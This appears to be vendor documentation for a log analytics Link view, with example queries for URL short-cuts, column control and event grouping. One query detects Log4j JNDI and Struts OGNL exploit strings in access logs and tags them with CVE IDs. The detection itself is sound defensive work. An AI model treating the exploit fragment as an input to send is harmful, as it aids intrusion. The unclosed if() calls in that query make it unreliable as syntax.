Main Table

The groups table displays the result of the analysis by listing the groups and the corresponding values for the following default fields:

Column Details

Field (s)

The field that’s used to analyze the group


The number of log records in the group

Start Time

The start of the time period for which the logs are considered for the analysis

End Time

The end of the time period for which the logs are considered for the analysis

Group Duration

The duration of the log event for the group

Add URLs to Link Table

You can create links using the url function of the eval command.

In the following query, the values for Search 1, Search 2, and Search 3 are assigned URLs:

'Log Source' = 'Database Alert Logs' 
| link cluster() 
| where 'Potential Issue' = '1' 
| nlp keywords('Cluster Sample') as 'Database Error' 
| eval 'Search 1' = url('' || 'Database Error') 
| eval 'Search 2' = url('' || 'Database Error', Errors) 
| eval 'Search 3' = url(google, 'Database Error')

Link table with the links added using the url function in the eval command

In the above analysis:

  • Search 1, Search 2, and Search 3 are now clickable Fields. Click the link to view the search results for those keywords.

  • Search 2 does not display the entire URL. Instead, the second parameter in the url function is used to give the URL a different name, for example, Errors.

  • Search 3 is similar to Search 1, but the short-cut google is used to generate the URL. Instead of using the whole URL, you can use similar short-cuts.

Use URL Short-Cut with Custom Name

Consider the following example where a name is provided for the short-cut:

'Log Source' = 'Database Alert Logs' 
| link cluster() 
| where 'Potential Issue' = '1' 
| nlp keywords('Cluster Sample') as 'Database Error' 
| eval 'Search 1' = url('' || 'Database Error') 
| eval 'Search 2' = url('' || 'Database Error', Errors) 
| eval 'Search 3' = url(google, 'Database Error') 
| eval 'Search 4' = url(google, 'Search Using Google', 'Database Error')
| eval 'Search 5' = url(duckduckgo, 'Search Using DuckDuckGo', 'Database Error')

Oracle-defined shortcuts google and duckduckgo and their custom names

In the above example, Search 4 is similar to Search 3 but only differs in the name given to the short-cut in Search 4. The short-cut google has the name Search Using Google which is displayed in the table. In Search 5, the short-cut duckduckgo has the name Search Using DuckDuckGo which is displayed in the table. For a full list of Oracle-defined short-cuts available with the url function, see Oracle-Defined url Short-Cuts.

Use the CVE Short-cut to Link to CVE Databases

Use the cve short-cut in the url function to create a link to the CVE repository.

'Log Source' like '%Access Logs%' 
| link 'Client Host Continent' 
| addfields [ jndi | stats count as 'JNDI Count' ],
            [ URI like '%context.get(%com.opensymphony.xwork2.dispatcher.httpservletresponse%' | stats count as 'GetContext Count' ] 
| eval 'Threat ID' = if('JNDI Count' > 0,       'CVE-2021-44228',
                        'GetContext Count' > 0, 'CVE-2013-2251',
| eval Description = if('JNDI Count' > 0,       'Log4j Vulnerability - ' || 'Threat ID',
                        'GetContext Count' > 0, 'Struts Exploit - '      || 'Threat ID',
| eval CVE = url(cve, Description, 'Threat ID')
| fields -'Threat ID', -Description, -'JNDI Count', -'GetContext Count'

CVE Shortcut to Link to CVE Databases

In the above example, the CVE column links to the CVE repository for the value of each Client Host Continent from the Access Logs.

Use the OCID Shortcut to Automatically Link to OCI Resources

Use the ocid short-cut in the url() function to create a link to a relevant page to OCI. If the resource has a specific page, then the URL would point to the direct link. Otherwise the URL would point to the Resource Query Service results for that OCID.

'Log Source' = 'OCI Audit Logs' and 'Resource ID' like 'ocid%' and 
'Resource ID' not like in ('%managementsavedsearch%', '%managementdashboard%', '%organizationsentity%', '%coreservicesworkrequest%')
| eval 'Resource Type' = substr('Resource ID', 6, indexOf('Resource ID', '.', 6))
| link 'Resource Type'
| stats earliest('Resource ID') as 'Resource ID'
| eval 'OCI Resource' = url(ocid, 'Resource ID')
| sort 'Resource Type'
| fields -'Start Time', -'End Time', -Count, -'Resource ID'

OCID Shortcut to Link to OCI Resources

In the above example, the OCID of each OCI resource type is picked up from the OCI Audit Logs.

Hide, Show, or Order the Table Columns

Use the fields target = ui command to control the fields that should be hidden or shown in the link groups table. You can also use this command to control the order of the fields.

Here are a few examples:

Hide all the Time fields, order the table as Size, Log Source, Count:

* | eval 'Raw Size' = unit('Raw Size', byte)
 | link 'Log Source'
 | stats sum('Raw Size') as Size
 | fields target = ui -'*Time', Size, 'Log Source', Count

Same as above, but using multiple fields commands:

* | eval 'Raw Size' = unit('Raw Size', byte)
 | link 'Log Source'
 | stats sum('Raw Size') as Size
 | fields target = ui -'*Time'
 | fields target = ui Size, 'Log Source', Count 

Combination of fields and fields target = ui (fields without target = ui performs filtering in the backend):

* | eval 'Raw Size' = unit('Raw Size', byte)
 | link 'Log Source'
 | stats sum('Raw Size') as Size
 | fields -'*Time'
 | fields target = ui Size, 'Log Source', Count 

Change the Group Alias

Each row in the link table corresponds to a Group. You can change the alias for Group, Groups, and Log Records tabs.

In the Options menu, modify the Group Alias, Groups Alias, and Log Records Alias values.

The Group Alias is used when there is only one item in the main table.

Join Multiple Groups Using the Map Command

Use map command to join multiple sub-groups from the existing linked Groups. This is useful to assign a Session ID for related events, or to correlate events across different servers or log sources.

For example, the below query joins Out of Memory events with other events that are within 30 minutes, and colors these groups to highlight a context for the Out of Memory outage:

* | link Server, Label
  | createView [ *   | where Label = 'Out of Memory' 
                     | rename Entity as 'OOM Server', 'Start Time' as 'OOM Begin Time' ] as 'Out of Memory Events'
  | sort Entity, 'Start Time'
  | map [ * | where Label != 'Out of Memory' and Server = 'OOM Server' and 
                    'Start Time' >= dateAdd('OOM Begin Time', minute,-30) and 'Start Time' <= 'OOM Begin Time'
            | eval Context = Yes 
        ] using 'Out of Memory Events'
  | highlightgroups color = yellow [ * | where Context = Yes ] as '30 Minutes before Out of Memory'
  | highlightgroups priority = high [ * | where Label = 'Out of Memory' ] as 'Server Out of Memory'

joins Out of Memory events with other events that are within 30 minutes

See map.

Create Sub-Groups Using the Createview Command

Use createview command to create sub-groups from the existing linked groups. This can be used in conjunction with the map command to join groups.

For example, you can group all the Out of Memory errors using the following command:

* | link Entity, Label 
  | createView  [ * | where Label = 'Out of Memory' ] as 'Out of Memory Events'

See createview.

Search and Highlight Link Groups

Use highlightgroups command to search one or more columns in the Link results and highlight specific groups. You can optionally assign a priority to the highlighted regions. The priority would be used to color the regions. You can also explicitly specify a color.

For example:

| link Label 
| highlightgroups priority = medium [ * | where Label in ('Log Writer Switch', 'Checkpoint Wait') ] 
| highlightgroups priority = high   [ * | where Label = 'Service Stopped' ] as Shutdown 
| highlightgroups color = #68C182   [ * | where Label = 'Service Started' ] as Startup

chart options to select the highlighted groups

See highlightgroups.

Optionally, you can merge the highlighted columns to create a single column:

merge the highlighted columns to create a single column